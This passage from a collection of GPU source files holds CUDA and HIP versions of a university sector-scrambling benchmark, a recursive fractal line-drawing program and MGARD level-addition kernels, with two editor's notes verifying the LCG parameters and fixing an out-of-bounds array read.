     return;                                      // safety precaution

  // convert the sector size into number of 4-byte words (it is assumed that sizeof(unsigned int) = 4)
  // and define boundaries
  n_words = sector_size / 4u;

  // adjust pointers
  sector_data += n_words * idx;
  sector_number += idx;

  // initialize the linear congruencial pseudo-random number generator
  // (section 3.2.1.2 of The Art of Computer Programming presents the theory behind the restrictions on a and c)
  i = sector_number[0];                           // get the sector number
  a = 0xACA00001u ^ ((i & 0x0F0F0F0Fu) << 2);     // a must be a multiple of 4 plus 1
  c = 0x00ACA001u ^ ((i & 0xF0F0F0F0u) >> 3);     // c must be odd
  x = 0xACA02019u;                                // initial state

  // modify the sector data
  for (i = 0u; i < n_words; i++)
    { x = a * x + c;                              // update the pseudo-random generator state
      sector_data[i] ^= x;
    }
}

static double get_delta_time(void)
{
  static struct timespec t0,t1;

  t0 = t1;
  if(clock_gettime(CLOCK_MONOTONIC,&t1) != 0)
    { perror("clock_gettime");
      exit(1);
    }
  return (double)(t1.tv_sec - t0.tv_sec) + 1.0e-9 * (double)(t1.tv_nsec - t0.tv_nsec);
}
9120fe38d32f8885d391d1bf984a6dade7c14e5f.cu
// // Tomás Oliveira e Silva / António Rui Borges // // ACA 2019/2020 // // Reference implementation 1 // #include <time.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include "common.h" #include <cuda_runtime.h> //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // program configuration // #ifndef SECTOR_SIZE # define SECTOR_SIZE 512 #endif #ifndef N_SECTORS # define N_SECTORS (1 << 21) #endif static void modify_sector_cpu_kernel (unsigned int *sector_data, unsigned int sector_number, unsigned int n_sectors, unsigned int sector_size); __global__ static void modify_sector_cuda_kernel (unsigned int * __restrict__ sector_data, unsigned int * __restrict__ sector_number, unsigned int n_sectors, unsigned int sector_size); static double get_delta_time(void); //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Main program // int main (int argc, char **argv) { printf("%s Starting...\n", argv[0]); if (sizeof (unsigned int) != (size_t) 4) return 1; // fail with prejudice if an integer does not have 4 bytes // set up device int dev = 0; int i; cudaDeviceProp deviceProp; CHECK (cudaGetDeviceProperties (&deviceProp, dev)); printf("Using Device %d: %s\n", dev, deviceProp.name); CHECK (cudaSetDevice (dev)); // create memory areas in host and device memory where the disk sectors data and sector numbers will be stored size_t sector_data_size; size_t sector_number_size; unsigned int *host_sector_data, *host_sector_number; unsigned int *device_sector_data, *device_sector_number; sector_data_size = (size_t) N_SECTORS * (size_t) SECTOR_SIZE; sector_number_size = (size_t) N_SECTORS * sizeof (unsigned int); if ((sector_data_size + sector_number_size) > (size_t) 1.3e9) { fprintf (stderr,"The GTX 1060 cannot handle more than 5.5GiB of memory!\n"); exit (1); } printf ("Total sector data size: %lu\n", sector_data_size); printf ("Total sector numbers data size: %lu\n", sector_number_size); host_sector_data = (unsigned int *) malloc (sector_data_size); host_sector_number = (unsigned int *) malloc (sector_number_size); CHECK (cudaMalloc ((void **) &device_sector_data, sector_data_size)); CHECK (cudaMalloc ((void **) &device_sector_number, sector_number_size)); // initialize the host data (void) get_delta_time (); srand(0xACA2019); for (i = 0; i < (int) (sector_data_size / (int) sizeof(unsigned int)); i++) host_sector_data[i] = 108584447u * (unsigned int) i; // "pseudo-random" data (faster than using the rand() function) for(i = 0; i < (int) (sector_number_size / (int)sizeof(unsigned int)); i++) host_sector_number[i] = (rand () & 0xFFFF) | ((rand () & 0xFFFF) << 16); printf ("The initialization of host data took %.3e seconds\n",get_delta_time ()); // copy the host data to the device memory (void) get_delta_time (); CHECK (cudaMemcpy (device_sector_data, host_sector_data, sector_data_size, cudaMemcpyHostToDevice)); CHECK (cudaMemcpy (device_sector_number, host_sector_number, sector_number_size, cudaMemcpyHostToDevice)); printf ("The transfer of %ld bytes from the host to the device took %.3e seconds\n", (long) sector_data_size + (long) sector_number_size, get_delta_time ()); // run the computational kernel // as an example, N_SECTORS threads are launched where each thread deals with one sector unsigned int gridDimX,gridDimY,gridDimZ,blockDimX,blockDimY,blockDimZ; int n_sectors, sector_size; n_sectors = N_SECTORS; sector_size = SECTOR_SIZE; 
blockDimX = 1 << 0; // optimize! blockDimY = 1 << 3; // optimize! blockDimZ = 1; // optimize! gridDimX = 1 << 12; // optimize! gridDimY = 1 << 6; // optimize! gridDimZ = 1; // optimize! if ((blockDimX * blockDimY * blockDimZ * gridDimX * gridDimY * gridDimZ) != N_SECTORS) { fprintf (stderr,"Wrong launch configuration!\n"); exit (1); } dim3 grid (gridDimX, gridDimY, gridDimZ); dim3 block (blockDimX, blockDimY, blockDimZ); (void) get_delta_time (); modify_sector_cuda_kernel <<<grid, block>>> (device_sector_data, device_sector_number, n_sectors, sector_size); CHECK (cudaDeviceSynchronize ()); // wait for kernel to finish CHECK (cudaGetLastError ()); // check for kernel errors printf("The CUDA kernel <<<(%d,%d,%d), (%d,%d,%d)>>> took %.3e seconds to run\n", gridDimX, gridDimY, gridDimZ, blockDimX, blockDimY, blockDimZ, get_delta_time ()); // copy kernel result back to host side unsigned int *modified_device_sector_data; modified_device_sector_data = (unsigned int *) malloc (sector_data_size); CHECK (cudaMemcpy (modified_device_sector_data, device_sector_data, sector_data_size, cudaMemcpyDeviceToHost)); printf ("The transfer of %ld bytes from the device to the host took %.3e seconds\n", (long) sector_data_size, get_delta_time ()); // free device global memory CHECK (cudaFree (device_sector_data)); CHECK (cudaFree (device_sector_number)); // reset device CHECK (cudaDeviceReset ()); // compute the modified sector data on the CPU (void) get_delta_time (); for (i = 0; i < N_SECTORS; i++) modify_sector_cpu_kernel (&host_sector_data[i*SECTOR_SIZE/(sizeof (unsigned int))], host_sector_number[i], n_sectors, sector_size); printf("The cpu kernel took %.3e seconds to run (single core)\n",get_delta_time ()); // compare for(i = 0; i < (int) sector_data_size / (int) sizeof (unsigned int); i++) if (host_sector_data[i] != modified_device_sector_data[i]) { int sector_words = sector_size / (int) sizeof (unsigned int); printf ("Mismatch in sector %d, word %d\n", i / sector_words, i % sector_words); exit(1); } printf ("All is well!\n"); // free host memory free (host_sector_data); free (host_sector_number); free (modified_device_sector_data); return 0; } static void modify_sector_cpu_kernel (unsigned int *sector_data, unsigned int sector_number, unsigned int n_sectors, unsigned int sector_size) { unsigned int x, i, a, c, n_words; // convert the sector size into number of 4-byte words (it is assumed that sizeof(unsigned int) = 4) n_words = sector_size / 4u; // initialize the linear congruencial pseudo-random number generator // (section 3.2.1.2 of The Art of Computer Programming presents the theory behind the restrictions on a and c) i = sector_number; // get the sector number a = 0xACA00001u ^ ((i & 0x0F0F0F0Fu) << 2); // a must be a multiple of 4 plus 1 c = 0x00ACA001u ^ ((i & 0xF0F0F0F0u) >> 3); // c must be odd x = 0xACA02019u; // initial state // modify the sector data for (i = 0u; i < n_words; i++) { x = a * x + c; // update the pseudo-random generator state sector_data[i] ^= x; // modify the sector data } } __global__ static void modify_sector_cuda_kernel (unsigned int * __restrict__ sector_data, unsigned int * __restrict__ sector_number, unsigned int n_sectors, unsigned int sector_size) { unsigned int x, y, idx, i, a, c, n_words; // compute the thread number x = (unsigned int) threadIdx.x + (unsigned int) blockDim.x * (unsigned int) blockIdx.x; y = (unsigned int) threadIdx.y + (unsigned int) blockDim.y * (unsigned int) blockIdx.y; idx = (unsigned int) blockDim.x * (unsigned int) gridDim.x * y + x; if (idx 
>= n_sectors) return; // safety precaution // convert the sector size into number of 4-byte words (it is assumed that sizeof(unsigned int) = 4) // and define boundaries n_words = sector_size / 4u; // adjust pointers sector_data += n_words * idx; sector_number += idx; // initialize the linear congruencial pseudo-random number generator // (section 3.2.1.2 of The Art of Computer Programming presents the theory behind the restrictions on a and c) i = sector_number[0]; // get the sector number a = 0xACA00001u ^ ((i & 0x0F0F0F0Fu) << 2); // a must be a multiple of 4 plus 1 c = 0x00ACA001u ^ ((i & 0xF0F0F0F0u) >> 3); // c must be odd x = 0xACA02019u; // initial state // modify the sector data for (i = 0u; i < n_words; i++) { x = a * x + c; // update the pseudo-random generator state sector_data[i] ^= x; } } static double get_delta_time(void) { static struct timespec t0,t1; t0 = t1; if(clock_gettime(CLOCK_MONOTONIC,&t1) != 0) { perror("clock_gettime"); exit(1); } return (double)(t1.tv_sec - t0.tv_sec) + 1.0e-9 * (double)(t1.tv_nsec - t0.tv_nsec); }
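Editor's note: both kernels in this pair derive per-sector LCG parameters with XOR masks chosen so that the full-period conditions for a modulus of 2^32 still hold (increment c odd, multiplier a congruent to 1 modulo 4, exactly as the inline comments state). Below is a small host-side check of that invariant, added for illustration only; the sample sector numbers are arbitrary and nothing in it appears in the original sources.

// Editorial sketch only: verifies the parameter rules the sector-modification kernels rely on.
#include <cassert>
#include <cstdio>

int main()
{
    unsigned int samples[] = { 0u, 1u, 0xDEADBEEFu, 0xFFFFFFFFu, 123456u };
    for (unsigned int i : samples) {
        unsigned int a = 0xACA00001u ^ ((i & 0x0F0F0F0Fu) << 2);  // same formula as the kernels
        unsigned int c = 0x00ACA001u ^ ((i & 0xF0F0F0F0u) >> 3);
        assert(a % 4u == 1u);   // the shifted term has its two low bits clear, so the XOR keeps a = 1 (mod 4)
        assert(c % 2u == 1u);   // the shifted term has bit 0 clear, so the XOR keeps c odd
    }
    std::printf("per-sector LCG parameters satisfy the full-period conditions\n");
    return 0;
}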
1428a7c2d9892b49f8c0a78b7657e4f19e8a1da5.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> #include <iostream> #include <time.h> #include <iomanip> #include <cmath> #include <cudaErrors.h> #include <thrust/complex.h> #include <ImageHelper.h> __device__ double distance(double x1,double y1,double x2,double y2) { return sqrt((x1-x2)*(x1-x2) + (y1-y2)*(y1-y2)); } __global__ void Line(unsigned int nx,unsigned int ny,double px1,double py1,double px2,double py2,double thickness,PixelInfo *img){ int i = threadIdx.x + blockIdx.x * blockDim.x; int j = threadIdx.y + blockIdx.y * blockDim.y; if(i >= nx || j >= ny){ return; } // if(px1 < px2+thickness && px2 < px1+thickness) { // printf("%d %d - %d %d",px1,py1,px2,py2); // printf("(abs(i-px1) <= thickness || abs(i-px2) <= thickness) : %d",(abs(i-px1) <= thickness || abs(i-px2) <= thickness)); // printf("(distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness) : %d",(distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness)); // } //Slope infinite if (px1 < px2+thickness && px2 < px1+thickness && (abs(i-px1) <= thickness || abs(i-px2) <= thickness) && (distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness)){ img[j*nx+i].r = 255; img[j*nx+i].g = 255; img[j*nx+i].b = 255; return; } else if (px1 == px2) { return; } // Takes care of all slopes except px2 = px1 case double m = double(py2-py1)/double(px2-px1); // y-y1 = m * (x-x1) // y-y2 = m * (x-x2) double j_approx1 = m * i - m * px1 + py1; double j_approx2 = m * i - m * px2 + py2; if ( (abs(j-j_approx1) <= thickness || abs(j-j_approx2) <= thickness) && (distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness) ){ img[j*nx+i].r = 255; img[j*nx+i].g = 255; img[j*nx+i].b = 255; } } struct Point { double x; double y; }; Point operator / (const Point& obj,double s){ return {obj.x/s , obj.y/s}; } Point operator + (const Point& obj1,const Point& obj2){ return {obj1.x + obj2.x , obj1.y + obj2.y}; } Point operator - (const Point& obj){ return {-obj.x, -obj.y}; } Point operator * (const Point& obj,double s){ return {obj.x*s , obj.y*s}; } double distance (const Point& obj1,const Point& obj2){ return sqrt((obj1.x-obj2.x)*(obj1.x-obj2.x) + (obj1.y-obj2.y)*(obj1.y-obj2.y)); } std::ostream& operator << (std::ostream& out ,const Point& obj){ out << obj.x << " " << obj.y << " " ; return out; } struct Quad { Point p1; Point p2; Point p3; Point p4; }; unsigned int nx = 1200; unsigned int ny = 1200; unsigned int tx = 8; unsigned int ty = 4; Point rotate(Point p,double theta) { theta = M_PI * theta / 180.0; // convert to radian Point p_new; p_new.x = p.x*cos(theta) - p.y*sin(theta); p_new.y = p.y*cos(theta) + p.x*sin(theta); return p_new; } Point translate(Point p,Point new_origin) { Point p_new; p_new.x = p.x - new_origin.x; p_new.y = p.y - new_origin.y; return p_new; } void drawTest(Quad t,int curr_depth,int max_depth,int theta,PixelInfo* window){ if(curr_depth >= max_depth) return; dim3 blocks(nx/tx+1,ny/ty+1); dim3 threads(tx,ty); t.p2.x = t.p1.x + (t.p4.x-t.p1.x)*1.0/3; t.p3.x = t.p1.x + (t.p4.x-t.p1.x)*2.0/3; t.p2.y = t.p1.y + (t.p4.y-t.p1.y)*1.0/3; t.p3.y = t.p1.y + (t.p4.y-t.p1.y)*2.0/3; Point mp = translate(rotate(translate(t.p3,t.p2),theta),-t.p2); //std::cout << t.p1 << t.p2 << mp << t.p3 << t.p4 << std::endl; hipLaunchKernelGGL(( Line), dim3(blocks),dim3(threads), 0, 0, 
nx,ny,t.p1.x,t.p1.y,t.p2.x,t.p2.y,1,window); checkCudaErrors(hipGetLastError()); checkCudaErrors(hipDeviceSynchronize()); hipLaunchKernelGGL(( Line), dim3(blocks),dim3(threads), 0, 0, nx,ny,t.p2.x,t.p2.y,mp.x,mp.y,1,window); checkCudaErrors(hipGetLastError()); checkCudaErrors(hipDeviceSynchronize()); hipLaunchKernelGGL(( Line), dim3(blocks),dim3(threads), 0, 0, nx,ny,mp.x,mp.y,t.p3.x,t.p3.y,1,window); checkCudaErrors(hipGetLastError()); checkCudaErrors(hipDeviceSynchronize()); hipLaunchKernelGGL(( Line), dim3(blocks),dim3(threads), 0, 0, nx,ny,t.p3.x,t.p3.y,t.p4.x,t.p4.y,1,window); checkCudaErrors(hipGetLastError()); checkCudaErrors(hipDeviceSynchronize()); Quad nt1; Quad nt2; Quad nt3; Quad nt4; nt1.p1 = t.p1; nt1.p4 = t.p2; nt2.p1 = t.p2; nt2.p4 = mp; nt3.p1 = mp; nt3.p4 = t.p3; nt4.p1 = t.p3; nt4.p4 = t.p4; drawTest(nt1,curr_depth+1,max_depth,theta,window); drawTest(nt2,curr_depth+1,max_depth,theta,window); drawTest(nt3,curr_depth+1,max_depth,theta,window); drawTest(nt4,curr_depth+1,max_depth,theta,window); drawTest(nt1,curr_depth+1,max_depth,-theta,window); drawTest(nt2,curr_depth+1,max_depth,-theta,window); drawTest(nt3,curr_depth+1,max_depth,-theta,window); drawTest(nt4,curr_depth+1,max_depth,-theta,window); } int main() { Point p[3]; Quad inital_quad[3]; dim3 blocks(nx/tx+1,ny/ty+1); dim3 threads(tx,ty); // Alloc Img // PixelInfo *img; checkCudaErrors(hipMallocManaged((void **)&img,nx*ny*sizeof(PixelInfo))); for(int step=0; step < 3; step++){ p[step].x = nx/2.0 + cos(2.0*M_PI/double(3)*step)*nx/2.0; p[step].y = ny/2.0 + sin(2.0*M_PI/double(3)*step)*ny/2.0; //printf("%d %lf - %lf %lf\n",step,2*M_PI/double(shape_pts.n)*step,shape_pts.p[step].x,shape_pts.p[step].y ); } inital_quad[0].p1 = p[0]; inital_quad[0].p4 = p[1]; inital_quad[1].p1 = p[1]; inital_quad[1].p4 = p[2]; inital_quad[2].p1 = p[2]; inital_quad[2].p4 = p[3]; int n = 6; for(int depth=0;depth<n;depth++) { drawTest(inital_quad[0],0,depth,60,img); drawTest(inital_quad[1],0,depth,60,img); drawTest(inital_quad[2],0,depth,60,img); drawTest(inital_quad[0],0,depth,-60,img); drawTest(inital_quad[1],0,depth,-60,img); drawTest(inital_quad[2],0,depth,-60,img); // Save Img // std::stringstream ss; ss << "./save_folder/Img-" << std::setfill('0') << std::setw(5) << depth << ".jpg"; saveImage(img,nx,ny,ss.str().c_str()); } // Clean Up // checkCudaErrors(hipFree(img)); return 0; }
1428a7c2d9892b49f8c0a78b7657e4f19e8a1da5.cu
#include <stdio.h> #include <iostream> #include <time.h> #include <iomanip> #include <cmath> #include <cudaErrors.h> #include <thrust/complex.h> #include <ImageHelper.h> __device__ double distance(double x1,double y1,double x2,double y2) { return sqrt((x1-x2)*(x1-x2) + (y1-y2)*(y1-y2)); } __global__ void Line(unsigned int nx,unsigned int ny,double px1,double py1,double px2,double py2,double thickness,PixelInfo *img){ int i = threadIdx.x + blockIdx.x * blockDim.x; int j = threadIdx.y + blockIdx.y * blockDim.y; if(i >= nx || j >= ny){ return; } // if(px1 < px2+thickness && px2 < px1+thickness) { // printf("%d %d - %d %d",px1,py1,px2,py2); // printf("(abs(i-px1) <= thickness || abs(i-px2) <= thickness) : %d",(abs(i-px1) <= thickness || abs(i-px2) <= thickness)); // printf("(distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness) : %d",(distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness)); // } //Slope infinite if (px1 < px2+thickness && px2 < px1+thickness && (abs(i-px1) <= thickness || abs(i-px2) <= thickness) && (distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness)){ img[j*nx+i].r = 255; img[j*nx+i].g = 255; img[j*nx+i].b = 255; return; } else if (px1 == px2) { return; } // Takes care of all slopes except px2 = px1 case double m = double(py2-py1)/double(px2-px1); // y-y1 = m * (x-x1) // y-y2 = m * (x-x2) double j_approx1 = m * i - m * px1 + py1; double j_approx2 = m * i - m * px2 + py2; if ( (abs(j-j_approx1) <= thickness || abs(j-j_approx2) <= thickness) && (distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness) ){ img[j*nx+i].r = 255; img[j*nx+i].g = 255; img[j*nx+i].b = 255; } } struct Point { double x; double y; }; Point operator / (const Point& obj,double s){ return {obj.x/s , obj.y/s}; } Point operator + (const Point& obj1,const Point& obj2){ return {obj1.x + obj2.x , obj1.y + obj2.y}; } Point operator - (const Point& obj){ return {-obj.x, -obj.y}; } Point operator * (const Point& obj,double s){ return {obj.x*s , obj.y*s}; } double distance (const Point& obj1,const Point& obj2){ return sqrt((obj1.x-obj2.x)*(obj1.x-obj2.x) + (obj1.y-obj2.y)*(obj1.y-obj2.y)); } std::ostream& operator << (std::ostream& out ,const Point& obj){ out << obj.x << " " << obj.y << " " ; return out; } struct Quad { Point p1; Point p2; Point p3; Point p4; }; unsigned int nx = 1200; unsigned int ny = 1200; unsigned int tx = 8; unsigned int ty = 4; Point rotate(Point p,double theta) { theta = M_PI * theta / 180.0; // convert to radian Point p_new; p_new.x = p.x*cos(theta) - p.y*sin(theta); p_new.y = p.y*cos(theta) + p.x*sin(theta); return p_new; } Point translate(Point p,Point new_origin) { Point p_new; p_new.x = p.x - new_origin.x; p_new.y = p.y - new_origin.y; return p_new; } void drawTest(Quad t,int curr_depth,int max_depth,int theta,PixelInfo* window){ if(curr_depth >= max_depth) return; dim3 blocks(nx/tx+1,ny/ty+1); dim3 threads(tx,ty); t.p2.x = t.p1.x + (t.p4.x-t.p1.x)*1.0/3; t.p3.x = t.p1.x + (t.p4.x-t.p1.x)*2.0/3; t.p2.y = t.p1.y + (t.p4.y-t.p1.y)*1.0/3; t.p3.y = t.p1.y + (t.p4.y-t.p1.y)*2.0/3; Point mp = translate(rotate(translate(t.p3,t.p2),theta),-t.p2); //std::cout << t.p1 << t.p2 << mp << t.p3 << t.p4 << std::endl; Line<<<blocks,threads>>>(nx,ny,t.p1.x,t.p1.y,t.p2.x,t.p2.y,1,window); checkCudaErrors(cudaGetLastError()); checkCudaErrors(cudaDeviceSynchronize()); 
Line<<<blocks,threads>>>(nx,ny,t.p2.x,t.p2.y,mp.x,mp.y,1,window); checkCudaErrors(cudaGetLastError()); checkCudaErrors(cudaDeviceSynchronize()); Line<<<blocks,threads>>>(nx,ny,mp.x,mp.y,t.p3.x,t.p3.y,1,window); checkCudaErrors(cudaGetLastError()); checkCudaErrors(cudaDeviceSynchronize()); Line<<<blocks,threads>>>(nx,ny,t.p3.x,t.p3.y,t.p4.x,t.p4.y,1,window); checkCudaErrors(cudaGetLastError()); checkCudaErrors(cudaDeviceSynchronize()); Quad nt1; Quad nt2; Quad nt3; Quad nt4; nt1.p1 = t.p1; nt1.p4 = t.p2; nt2.p1 = t.p2; nt2.p4 = mp; nt3.p1 = mp; nt3.p4 = t.p3; nt4.p1 = t.p3; nt4.p4 = t.p4; drawTest(nt1,curr_depth+1,max_depth,theta,window); drawTest(nt2,curr_depth+1,max_depth,theta,window); drawTest(nt3,curr_depth+1,max_depth,theta,window); drawTest(nt4,curr_depth+1,max_depth,theta,window); drawTest(nt1,curr_depth+1,max_depth,-theta,window); drawTest(nt2,curr_depth+1,max_depth,-theta,window); drawTest(nt3,curr_depth+1,max_depth,-theta,window); drawTest(nt4,curr_depth+1,max_depth,-theta,window); } int main() { Point p[3]; Quad inital_quad[3]; dim3 blocks(nx/tx+1,ny/ty+1); dim3 threads(tx,ty); // Alloc Img // PixelInfo *img; checkCudaErrors(cudaMallocManaged((void **)&img,nx*ny*sizeof(PixelInfo))); for(int step=0; step < 3; step++){ p[step].x = nx/2.0 + cos(2.0*M_PI/double(3)*step)*nx/2.0; p[step].y = ny/2.0 + sin(2.0*M_PI/double(3)*step)*ny/2.0; //printf("%d %lf - %lf %lf\n",step,2*M_PI/double(shape_pts.n)*step,shape_pts.p[step].x,shape_pts.p[step].y ); } inital_quad[0].p1 = p[0]; inital_quad[0].p4 = p[1]; inital_quad[1].p1 = p[1]; inital_quad[1].p4 = p[2]; inital_quad[2].p1 = p[2]; inital_quad[2].p4 = p[3]; int n = 6; for(int depth=0;depth<n;depth++) { drawTest(inital_quad[0],0,depth,60,img); drawTest(inital_quad[1],0,depth,60,img); drawTest(inital_quad[2],0,depth,60,img); drawTest(inital_quad[0],0,depth,-60,img); drawTest(inital_quad[1],0,depth,-60,img); drawTest(inital_quad[2],0,depth,-60,img); // Save Img // std::stringstream ss; ss << "./save_folder/Img-" << std::setfill('0') << std::setw(5) << depth << ".jpg"; saveImage(img,nx,ny,ss.str().c_str()); } // Clean Up // checkCudaErrors(cudaFree(img)); return 0; }
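Editor's note: in both copies of this recursive line-drawing example, main() declares Point p[3] but then evaluates p[3] when filling inital_quad[2].p4, which reads one element past the end of the array (undefined behavior). Below is a minimal corrected sketch of the initialization, assuming the intent was to close the triangle back onto its first vertex; that assumption is the editor's, not something stated in the original sources.

// Editorial sketch only: the triangle initialization with the out-of-bounds read removed.
#include <cmath>
#include <cstdio>

struct Point { double x; double y; };                       // same layout as in the file above
struct Quad  { Point p1; Point p2; Point p3; Point p4; };

int main()
{
    const double nx = 1200.0, ny = 1200.0;                  // image size used by the original
    Point p[3];
    Quad  initial_quad[3];                                  // spelled "inital_quad" in the original
    for (int step = 0; step < 3; step++) {
        p[step].x = nx / 2.0 + std::cos(2.0 * M_PI / 3.0 * step) * nx / 2.0;   // M_PI as used by the original (POSIX extension)
        p[step].y = ny / 2.0 + std::sin(2.0 * M_PI / 3.0 * step) * ny / 2.0;
    }
    initial_quad[0].p1 = p[0]; initial_quad[0].p4 = p[1];
    initial_quad[1].p1 = p[1]; initial_quad[1].p4 = p[2];
    initial_quad[2].p1 = p[2]; initial_quad[2].p4 = p[0];   // close the triangle; p[3] does not exist
    std::printf("last edge: (%g,%g) -> (%g,%g)\n",
                initial_quad[2].p1.x, initial_quad[2].p1.y,
                initial_quad[2].p4.x, initial_quad[2].p4.y);
    return 0;
}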
4ab851abb27096ef78bfca72cbbab9c925e57b7a.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "cuda/mgard_cuda_add_level.h" #include "cuda/mgard_cuda_common_internal.h" namespace mgard_cuda { template <typename T> __global__ void _add_level(int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *irow, int *icol, T *dv, int lddv, T *dwork, int lddwork) { int idx_x = (blockIdx.x * blockDim.x + threadIdx.x) * col_stride; int idx_y = (blockIdx.y * blockDim.y + threadIdx.y) * row_stride; for (int y = idx_y; y < nr; y += blockDim.y * gridDim.y * row_stride) { for (int x = idx_x; x < nc; x += blockDim.x * gridDim.x * col_stride) { int r = irow[y]; int c = icol[x]; dv[get_idx(lddv, r, c)] += dwork[get_idx(lddwork, r, c)]; } } } template <typename T> void add_level(mgard_cuda_handle<T> &handle, int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *dirow, int *dicol, T *dv, int lddv, T *dwork, int lddwork, int queue_idx) { int total_thread_x = nc / col_stride; int total_thread_y = nr / row_stride; int tbx = min(handle.B, total_thread_x); int tby = min(handle.B, total_thread_y); int gridx = ceil((float)total_thread_x / tbx); int gridy = ceil((float)total_thread_y / tby); dim3 threadsPerBlock(tbx, tby); dim3 blockPerGrid(gridx, gridy); hipLaunchKernelGGL(( _add_level), dim3(blockPerGrid), dim3(threadsPerBlock), 0, *(hipStream_t *)handle.get(queue_idx), nrow, ncol, nr, nc, row_stride, col_stride, dirow, dicol, dv, lddv, dwork, lddwork); gpuErrchk(hipGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(hipDeviceSynchronize()); #endif } template void add_level<double>(mgard_cuda_handle<double> &handle, int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *dirow, int *dicol, double *dv, int lddv, double *dwork, int lddwork, int queue_idx); template void add_level<float>(mgard_cuda_handle<float> &handle, int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *dirow, int *dicol, float *dv, int lddv, float *dwork, int lddwork, int queue_idx); template <typename T> __global__ void _add_level_cpt(int nr, int nc, int row_stride, int col_stride, T *dv, int lddv, T *dwork, int lddwork) { int idx_x = (blockIdx.x * blockDim.x + threadIdx.x) * col_stride; int idx_y = (blockIdx.y * blockDim.y + threadIdx.y) * row_stride; for (int y = idx_y; y < nr; y += blockDim.y * gridDim.y * row_stride) { for (int x = idx_x; x < nc; x += blockDim.x * gridDim.x * col_stride) { dv[get_idx(lddv, y, x)] += dwork[get_idx(lddwork, y, x)]; } } } template <typename T> void add_level_cpt(mgard_cuda_handle<T> &handle, int nr, int nc, int row_stride, int col_stride, T *dv, int lddv, T *dwork, int lddwork, int queue_idx) { int total_thread_x = nc / col_stride; int total_thread_y = nr / row_stride; int tbx = min(handle.B, total_thread_x); int tby = min(handle.B, total_thread_y); int gridx = ceil((float)total_thread_x / tbx); int gridy = ceil((float)total_thread_y / tby); dim3 threadsPerBlock(tbx, tby); dim3 blockPerGrid(gridx, gridy); hipLaunchKernelGGL(( _add_level_cpt), dim3(blockPerGrid), dim3(threadsPerBlock), 0, *(hipStream_t *)handle.get(queue_idx), nr, nc, row_stride, col_stride, dv, lddv, dwork, lddwork); gpuErrchk(hipGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(hipDeviceSynchronize()); #endif } template void add_level_cpt<double>(mgard_cuda_handle<double> &handle, int nr, int nc, int row_stride, int col_stride, double *dv, int lddv, double *dwork, int lddwork, int queue_idx); template void add_level_cpt<float>(mgard_cuda_handle<float> &handle, int nr, int 
nc, int row_stride, int col_stride, float *dv, int lddv, float *dwork, int lddwork, int queue_idx); template <typename T> __global__ void _add_level(int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *irow, int *icol, int *ifib, T *dv, int lddv1, int lddv2, T *dwork, int lddwork1, int lddwork2) { int z0 = blockIdx.z * blockDim.z + threadIdx.z * row_stride; int y0 = blockIdx.y * blockDim.y + threadIdx.y * col_stride; int x0 = blockIdx.x * blockDim.x + threadIdx.x * fib_stride; for (int z = z0; z * row_stride < nr; z += blockDim.z * gridDim.z * row_stride) { for (int y = y0; y * col_stride < nc; y += blockDim.y * gridDim.y * col_stride) { for (int x = x0; x * fib_stride < nf; x += blockDim.x * gridDim.x * fib_stride) { int z_strided = irow[z]; int y_strided = icol[y]; int x_strided = ifib[x]; dv[get_idx(lddv1, lddv2, z_strided, y_strided, x_strided)] += dwork[get_idx(lddwork1, lddwork2, z_strided, y_strided, x_strided)]; } } } } template <typename T> void add_level(mgard_cuda_handle<T> &handle, int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *dirow, int *dicol, int *difib, T *dv, int lddv1, int lddv2, T *dwork, int lddwork1, int lddwork2, int queue_idx) { int B_adjusted = min(8, handle.B); int total_thread_z = ceil((double)nr / (row_stride)); int total_thread_y = ceil((double)nc / (col_stride)); int total_thread_x = ceil((double)nf / (fib_stride)); int tbz = min(B_adjusted, total_thread_z); int tby = min(B_adjusted, total_thread_y); int tbx = min(B_adjusted, total_thread_x); int gridz = ceil((float)total_thread_z / tbz); int gridy = ceil((float)total_thread_y / tby); int gridx = ceil((float)total_thread_x / tbx); dim3 threadsPerBlock(tbx, tby, tbz); dim3 blockPerGrid(gridx, gridy, gridz); hipLaunchKernelGGL(( _add_level), dim3(blockPerGrid), dim3(threadsPerBlock), 0, *(hipStream_t *)handle.get(queue_idx), nrow, ncol, nfib, nr, nc, nf, row_stride, col_stride, fib_stride, dirow, dicol, difib, dv, lddv1, lddv2, dwork, lddwork1, lddwork2); gpuErrchk(hipGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(hipDeviceSynchronize()); #endif } template void add_level<double>(mgard_cuda_handle<double> &handle, int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *dirow, int *dicol, int *difib, double *dv, int lddv1, int lddv2, double *dwork, int lddwork1, int lddwork2, int queue_idx); template void add_level<float>(mgard_cuda_handle<float> &handle, int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *dirow, int *dicol, int 